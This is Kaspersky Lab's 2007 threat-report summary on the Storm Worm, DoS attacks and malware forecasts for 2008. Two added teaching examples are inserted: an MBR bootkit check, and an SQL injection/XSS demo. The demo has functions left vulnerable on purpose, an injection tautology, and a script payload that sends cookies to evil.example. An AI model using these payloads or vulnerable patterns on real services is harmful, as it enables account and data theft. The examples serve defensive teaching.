Threat evolution 2007: the death of "non-profit" malicious software. Kaspersky Security Bulletin 2007

Kaspersky Lab, a leading developer of secure content management solutions, announces the publication on Viruslist.com of its annual report, Kaspersky Security Bulletin 2007: The Evolution of Threats in 2007. The report was prepared by the company’s leading experts.

Kaspersky Lab’s annual report analyzes the most important changes in malware development trends. This is the first annual report to make use of a new methodology for processing statistical data. This report is intended for IT security professionals, as well as all users interested in computer virology.

2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world.

Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache.

Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds).

DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded as the first instance of cyber-warfare by many experts. Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs.

In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order, with technical support provided to customers. A good example of business organized along these lines is Pinch, a Trojan program whose authors produced more than 4,000 custom variants over several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia’s Federal Security Service (FSB), announced that the Trojan’s authors had been arrested.

Looking at the year’s results from the quantitative point of view, the clear leaders were game Trojans, which are designed to steal account data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data.

Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious.

These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.

Forecasts

1. Malware 2.0

The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected.

The model has the following main features:

  • A network of infected computers is not centrally controlled.
  • The malware actively resists third-party attempts to analyze its malicious activity and take control of it.
  • Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time.
  • Social engineering methods are skillfully used.
  • Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity.
  • Different functions are performed by different modules (instead of the all-in-one design).

The new generation of malicious programs can be regarded as Malware 2.0. These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.

2. Rootkits and “bootkits”

Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector, the Master Boot Record (MBR); programs that do this are called bootkits. This is a reincarnation of an old technique: code placed in the MBR is executed by the BIOS before the operating system (and therefore before any antivirus software) has loaded, so the malware takes control first and can hide itself from everything that boots after it. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.
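The following is an added example, not code from the report or from Kaspersky Lab, showing the check a practitioner would want for the bootkit scenario above: parse the 512-byte MBR (446 bytes of boot code, a 64-byte partition table of four 16-byte entries, and the 0x55AA signature), record a hash of the boot code on a clean system, and later compare a freshly read sector against that baseline. The two MBRs are constructed inline so the script runs offline; the "boot code changed while the partition table stayed intact" heuristic is an assumption of this example, chosen because a bootkit that wants the system to keep booting normally has no reason to alter the partition entries.

```python
"""Parse a 512-byte MBR and compare its boot code with a known-good baseline.

Added example: the MBR layout is the standard one; the sample sectors and the
'bootkit-like' heuristic are this example's own assumptions, not from the report.
"""
import hashlib
import struct

MBR_SIZE = 512
BOOT_CODE_LEN = 446            # bytes 0..445: code the BIOS jumps into
PART_TABLE_OFF = 446           # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510..511
PART_ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    """Return the boot-code hash, raw partition table and decoded partition entries."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly %d bytes" % MBR_SIZE)
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for slot in range(4):
        off = PART_TABLE_OFF + 16 * slot
        status, _chs_start, ptype, _chs_end, lba_start, n_sectors = struct.unpack(
            PART_ENTRY_FMT, sector[off:off + 16])
        if ptype == 0:            # empty slot
            continue
        partitions.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": n_sectors})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partition_table": sector[PART_TABLE_OFF:510],
        "partitions": partitions,
    }


def check_mbr(sector, baseline_boot_code_sha256, baseline_partition_table):
    """Compare a freshly read MBR with a baseline taken from a clean system.

    Returns a list of findings; an empty list means nothing changed.
    """
    parsed = parse_mbr(sector)
    findings = []
    if parsed["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code changed")
    if parsed["partition_table"] != baseline_partition_table:
        findings.append("partition table changed")
    # Heuristic (assumption of this example): new boot code with the partition
    # table untouched is what a bootkit that still wants the OS to boot looks like.
    if findings == ["boot code changed"]:
        findings.append("boot code replaced with partition table intact: bootkit-like pattern")
    return findings


def build_mbr(boot_code, entries):
    """Assemble a constructed MBR from boot code bytes and (status, type, lba, sectors) tuples."""
    boot = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    table = b"".join(struct.pack(PART_ENTRY_FMT, status, b"\x00\x00\x00", ptype,
                                 b"\x00\x00\x00", lba, n)
                     for status, ptype, lba, n in entries)
    return boot + table.ljust(64, b"\x00") + BOOT_SIGNATURE


# Constructed sample data: one bootable NTFS-type partition (0x07) starting at LBA 2048.
PARTITIONS = [(0x80, 0x07, 2048, 1000000)]
CLEAN_MBR = build_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c", PARTITIONS)
# Same partition table, different boot code: what a bootkit infection would leave behind.
INFECTED_MBR = build_mbr(b"\xeb\x3c\x90" + b"\x90" * 40, PARTITIONS)


def demo():
    """Baseline the clean sector, then check the modified one against it."""
    baseline = parse_mbr(CLEAN_MBR)
    return check_mbr(INFECTED_MBR, baseline["boot_code_sha256"], baseline["partition_table"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real machine the sector comes from the raw disk (for example `open(r"\\.\PhysicalDrive0", "rb").read(512)` on Windows run as administrator, or `/dev/sda` on Linux as root) and the baseline hash must be stored off the host. The caveat that matters: an active bootkit can hook disk reads and hand back the original sector, so a clean result from inside the running system is not conclusive; read the sector after booting from known-good media before trusting it.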

3. File viruses

File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method.

In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.

4. Attacks targeting social networks

In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpace, LiveJournal, Blogger etc. will be in demand among cybercriminals. This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through the accounts of social network users, via their weblogs and profiles.

XSS, PHP and SQL injection attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in the Web 2.0 services themselves. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists for further attacks involving “traditional” methods.
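As an added illustration of the two service-side bugs named above (not code from the report, and written in Python with sqlite3 and html.escape rather than in PHP), the block below places a vulnerable user lookup and a vulnerable profile renderer next to their hardened forms. The user table, the names and the injected strings are constructed for the example.

```python
"""SQL injection and stored XSS: vulnerable and hardened forms side by side.

Added example with constructed data; it does not come from the report.
"""
import html
import sqlite3

# Constructed profile text that a malicious user might store in a "bio" field.
BOB_BIO = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def make_db():
    """Build an in-memory user table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, bio TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, bio, email) VALUES (?, ?, ?)", [
        ("alice", "likes cats", "alice@example.net"),
        ("bob", BOB_BIO, "bob@example.net"),
    ])
    return conn


def find_user_vulnerable(conn, name):
    """Deliberately vulnerable: the untrusted name is pasted into the SQL text,
    so a value like  x' OR '1'='1  rewrites the WHERE clause."""
    query = "SELECT name, email FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    """Hardened: a bound parameter is always data, never SQL syntax."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def render_bio_vulnerable(bio):
    """Deliberately vulnerable: user-controlled text inserted into HTML unescaped."""
    return "<p>%s</p>" % bio


def render_bio_safe(bio):
    """Hardened: escape <, >, &, quotes so the browser treats the bio as text."""
    return "<p>%s</p>" % html.escape(bio, quote=True)


def demo():
    """Show the effect of one injection payload against both lookups."""
    conn = make_db()
    payload = "x' OR '1'='1"
    return {
        "vulnerable_rows": find_user_vulnerable(conn, payload),
        "safe_rows": find_user_safe(conn, payload),
        "safe_html": render_bio_safe(BOB_BIO),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The tautology payload returns every row from the string-built query and nothing from the parameterized one; the escaped bio reaches the browser as literal text rather than as a script element. Parameterized queries and context-appropriate output encoding are the fixes the service has to apply; nothing the visiting user does protects them from either bug.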

5. Mobile threats

As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as they promised in late 2007.

The complete version of the Kaspersky Lab annual report, Kaspersky Security Bulletin 2007. The evolution of threats in 2007, is available on Viruslist.com.
